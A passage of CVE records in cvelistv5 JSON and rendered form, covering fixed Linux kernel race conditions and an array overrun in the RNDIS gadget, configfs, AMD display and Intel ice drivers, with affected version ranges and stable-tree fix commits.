"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/rndis.c",
"drivers/usb/gadget/function/rndis.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.6"
},
{
"lessThan": "4.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.232",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.304",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.269",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.232",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: rndis: add spinlock for rndis response list\n\nThere\u0027s no lock for rndis response list. It could cause list corruption\nif there\u0027re two different list_add at the same time like below.\nIt\u0027s better to add in rndis_add_response / rndis_free_response\n/ rndis_get_next_response to prevent any race condition on response list.\n\n[ 361.894299] [1: irq/191-dwc3:16979] list_add corruption.\nnext-\u003eprev should be prev (ffffff80651764d0),\nbut was ffffff883dc36f80. (next=ffffff80651764d0).\n\n[ 361.904380] [1: irq/191-dwc3:16979] Call trace:\n[ 361.904391] [1: irq/191-dwc3:16979] __list_add_valid+0x74/0x90\n[ 361.904401] [1: irq/191-dwc3:16979] rndis_msg_parser+0x168/0x8c0\n[ 361.904409] [1: irq/191-dwc3:16979] rndis_command_complete+0x24/0x84\n[ 361.904417] [1: irq/191-dwc3:16979] usb_gadget_giveback_request+0x20/0xe4\n[ 361.904426] [1: irq/191-dwc3:16979] dwc3_gadget_giveback+0x44/0x60\n[ 361.904434] [1: irq/191-dwc3:16979] dwc3_ep0_complete_data+0x1e8/0x3a0\n[ 361.904442] [1: irq/191-dwc3:16979] dwc3_ep0_interrupt+0x29c/0x3dc\n[ 361.904450] [1: irq/191-dwc3:16979] dwc3_process_event_entry+0x78/0x6cc\n[ 361.904457] [1: irq/191-dwc3:16979] dwc3_process_event_buf+0xa0/0x1ec\n[ 361.904465] [1: irq/191-dwc3:16979] dwc3_thread_interrupt+0x34/0x5c"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:14.492Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9f5d8ba538ef81cd86ea587ca3f8c77e26bea405"
},
{
"url": "https://git.kernel.org/stable/c/669c2b178956718407af5631ccbc61c24413f038"
},
{
"url": "https://git.kernel.org/stable/c/9f688aadede6b862a0a898792b1a35421c93636f"
},
{
"url": "https://git.kernel.org/stable/c/9ab652d41deab49848673c3dadb57ad338485376"
},
{
"url": "https://git.kernel.org/stable/c/4ce247af3f30078d5b97554f1ae6200a0222c15a"
},
{
"url": "https://git.kernel.org/stable/c/da514063440b53a27309a4528b726f92c3cfe56f"
},
{
"url": "https://git.kernel.org/stable/c/33222d1571d7ce8c1c75f6b488f38968fa93d2d9"
},
{
"url": "https://git.kernel.org/stable/c/aaaba1c86d04dac8e49bf508b492f81506257da3"
}
],
"title": "usb: gadget: rndis: add spinlock for rndis response list",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48926",
"datePublished": "2024-08-22T03:31:18.572Z",
"dateReserved": "2024-08-21T06:06:23.297Z",
"dateUpdated": "2025-05-04T08:26:14.492Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42119 (GCVE-0-2024-42119)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-07-11 17:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Skip finding free audio for unknown engine_id
[WHY]
ENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it
also means it is uninitialized and does not need free audio.
[HOW]
Skip and return NULL.
This fixes 2 OVERRUN issues reported by Coverity.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c Version: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.544Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42119",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:17:03.551339Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:05.530Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "eacca028a623f608607d02457122ee5284491e18",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "874261358d31fc772f2823604167e670983cc1ca",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "95ad20ee3c4efbb91f9a4ab08e070aa3697f5879",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "881fb6afc0004c5e6392ae2848f825bf051dae14",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
},
{
"lessThan": "1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3",
"status": "affected",
"version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/display/dc/core/dc_resource.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Skip finding free audio for unknown engine_id\n\n[WHY]\nENGINE_ID_UNKNOWN = -1 and can not be used as an array index. Plus, it\nalso means it is uninitialized and does not need free audio.\n\n[HOW]\nSkip and return NULL.\n\nThis fixes 2 OVERRUN issues reported by Coverity."
}
],
"providerMetadata": {
"dateUpdated": "2025-07-11T17:19:56.516Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9eb4db08a808e3a3ba59193aeb84a57a6dc4d8c9"
},
{
"url": "https://git.kernel.org/stable/c/eacca028a623f608607d02457122ee5284491e18"
},
{
"url": "https://git.kernel.org/stable/c/ffa7bd3ca9cfa902b857d1dc9a5f46fededf86c8"
},
{
"url": "https://git.kernel.org/stable/c/afaaebdee9bb9f26d9e13cc34b33bd0a7bf59488"
},
{
"url": "https://git.kernel.org/stable/c/874261358d31fc772f2823604167e670983cc1ca"
},
{
"url": "https://git.kernel.org/stable/c/95ad20ee3c4efbb91f9a4ab08e070aa3697f5879"
},
{
"url": "https://git.kernel.org/stable/c/881fb6afc0004c5e6392ae2848f825bf051dae14"
},
{
"url": "https://git.kernel.org/stable/c/1357b2165d9ad94faa4c4a20d5e2ce29c2ff29c3"
}
],
"title": "drm/amd/display: Skip finding free audio for unknown engine_id",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42119",
"datePublished": "2024-07-30T07:46:11.314Z",
"dateReserved": "2024-07-29T15:50:41.178Z",
"dateUpdated": "2025-07-11T17:19:56.516Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48931 (GCVE-0-2022-48931)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
configfs: fix a race in configfs_{,un}register_subsystem()
When configfs_register_subsystem() or configfs_unregister_subsystem()
is executing link_group() or unlink_group(),
it is possible that two processes add or delete list concurrently.
Some unfortunate interleavings of them can cause kernel panic.
One of cases is:
A --> B --> C --> D
A <-- B <-- C <-- D
delete list_head *B | delete list_head *C
--------------------------------|-----------------------------------
configfs_unregister_subsystem | configfs_unregister_subsystem
unlink_group | unlink_group
unlink_obj | unlink_obj
list_del_init | list_del_init
__list_del_entry | __list_del_entry
__list_del | __list_del
// next == C |
next->prev = prev |
| next->prev = prev
prev->next = next |
| // prev == B
| prev->next = next
Fix this by adding mutex when calling link_group() or unlink_group(),
but parent configfs_subsystem is NULL when config_item is root.
So I create a mutex configfs_subsystem_mutex.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa Version: 7063fbf2261194f72ee75afca67b3b38b554b5fa |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48931",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:49.740795Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:10.278Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/configfs/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "40805099af11f68c5ca7dbcfacf455da8f99f622",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "d1654de19d42f513b6cfe955cc77e7f427e05a77",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "a37024f7757c25550accdebf49e497ad6ae239fe",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "b7e2b91fcb5c78c414e33dc8d50642e307ca0c5a",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "a7ab53d3c27dfe83bb594456b9f38a37796ec39b",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "e7a66dd2687758718eddd79b542a95cf3aa488cc",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "3aadfd46858b1f64d4d6a0654b863e21aabff975",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
},
{
"lessThan": "84ec758fb2daa236026506868c8796b0500c047d",
"status": "affected",
"version": "7063fbf2261194f72ee75afca67b3b38b554b5fa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/configfs/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.16"
},
{
"lessThan": "2.6.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.232",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.304",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.269",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.232",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "2.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "2.6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nconfigfs: fix a race in configfs_{,un}register_subsystem()\n\nWhen configfs_register_subsystem() or configfs_unregister_subsystem()\nis executing link_group() or unlink_group(),\nit is possible that two processes add or delete list concurrently.\nSome unfortunate interleavings of them can cause kernel panic.\n\nOne of cases is:\nA --\u003e B --\u003e C --\u003e D\nA \u003c-- B \u003c-- C \u003c-- D\n\n delete list_head *B | delete list_head *C\n--------------------------------|-----------------------------------\nconfigfs_unregister_subsystem | configfs_unregister_subsystem\n unlink_group | unlink_group\n unlink_obj | unlink_obj\n list_del_init | list_del_init\n __list_del_entry | __list_del_entry\n __list_del | __list_del\n // next == C |\n next-\u003eprev = prev |\n | next-\u003eprev = prev\n prev-\u003enext = next |\n | // prev == B\n | prev-\u003enext = next\n\nFix this by adding mutex when calling link_group() or unlink_group(),\nbut parent configfs_subsystem is NULL when config_item is root.\nSo I create a mutex configfs_subsystem_mutex."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:20.045Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/40805099af11f68c5ca7dbcfacf455da8f99f622"
},
{
"url": "https://git.kernel.org/stable/c/d1654de19d42f513b6cfe955cc77e7f427e05a77"
},
{
"url": "https://git.kernel.org/stable/c/a37024f7757c25550accdebf49e497ad6ae239fe"
},
{
"url": "https://git.kernel.org/stable/c/b7e2b91fcb5c78c414e33dc8d50642e307ca0c5a"
},
{
"url": "https://git.kernel.org/stable/c/a7ab53d3c27dfe83bb594456b9f38a37796ec39b"
},
{
"url": "https://git.kernel.org/stable/c/e7a66dd2687758718eddd79b542a95cf3aa488cc"
},
{
"url": "https://git.kernel.org/stable/c/3aadfd46858b1f64d4d6a0654b863e21aabff975"
},
{
"url": "https://git.kernel.org/stable/c/84ec758fb2daa236026506868c8796b0500c047d"
}
],
"title": "configfs: fix a race in configfs_{,un}register_subsystem()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48931",
"datePublished": "2024-08-22T03:31:24.823Z",
"dateReserved": "2024-08-21T06:06:23.299Z",
"dateUpdated": "2025-05-04T08:26:20.045Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48941 (GCVE-0-2022-48941)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-06-19 12:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: fix concurrent reset and removal of VFs
Commit c503e63200c6 ("ice: Stop processing VF messages during teardown")
introduced a driver state flag, ICE_VF_DEINIT_IN_PROGRESS, which is
intended to prevent some issues with concurrently handling messages from
VFs while tearing down the VFs.
This change was motivated by crashes caused while tearing down and
bringing up VFs in rapid succession.
It turns out that the fix actually introduces issues with the VF driver
caused because the PF no longer responds to any messages sent by the VF
during its .remove routine. This results in the VF potentially removing
its DMA memory before the PF has shut down the device queues.
Additionally, the fix doesn't actually resolve concurrency issues within
the ice driver. It is possible for a VF to initiate a reset just prior
to the ice driver removing VFs. This can result in the remove task
concurrently operating while the VF is being reset. This results in
similar memory corruption and panics purportedly fixed by that commit.
Fix this concurrency at its root by protecting both the reset and
removal flows using the existing VF cfg_lock. This ensures that we
cannot remove the VF while any outstanding critical tasks such as a
virtchnl message or a reset are occurring.
This locking change also fixes the root cause originally fixed by commit
c503e63200c6 ("ice: Stop processing VF messages during teardown"), so we
can simply revert it.
Note that I kept these two changes together because simply reverting the
original commit alone would leave the driver vulnerable to worse race
conditions.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48941",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:17.899011Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.101Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice.h",
"drivers/net/ethernet/intel/ice/ice_main.c",
"drivers/net/ethernet/intel/ice/ice_virtchnl_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3c805fce07c9dbc47d8a9129c7c5458025951957",
"status": "affected",
"version": "c503e63200c679e362afca7aca9d3dc63a0f45ed",
"versionType": "git"
},
{
"lessThan": "2a3e61de89bab6696aa28b70030eb119968c5586",
"status": "affected",
"version": "c503e63200c679e362afca7aca9d3dc63a0f45ed",
"versionType": "git"
},
{
"lessThan": "fadead80fe4c033b5e514fcbadd20b55c4494112",
"status": "affected",
"version": "c503e63200c679e362afca7aca9d3dc63a0f45ed",
"versionType": "git"
},
{
"status": "affected",
"version": "8a08142433624fd1088bc8c13639408cf4e1707c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice.h",
"drivers/net/ethernet/intel/ice/ice_main.c",
"drivers/net/ethernet/intel/ice/ice_virtchnl_pf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
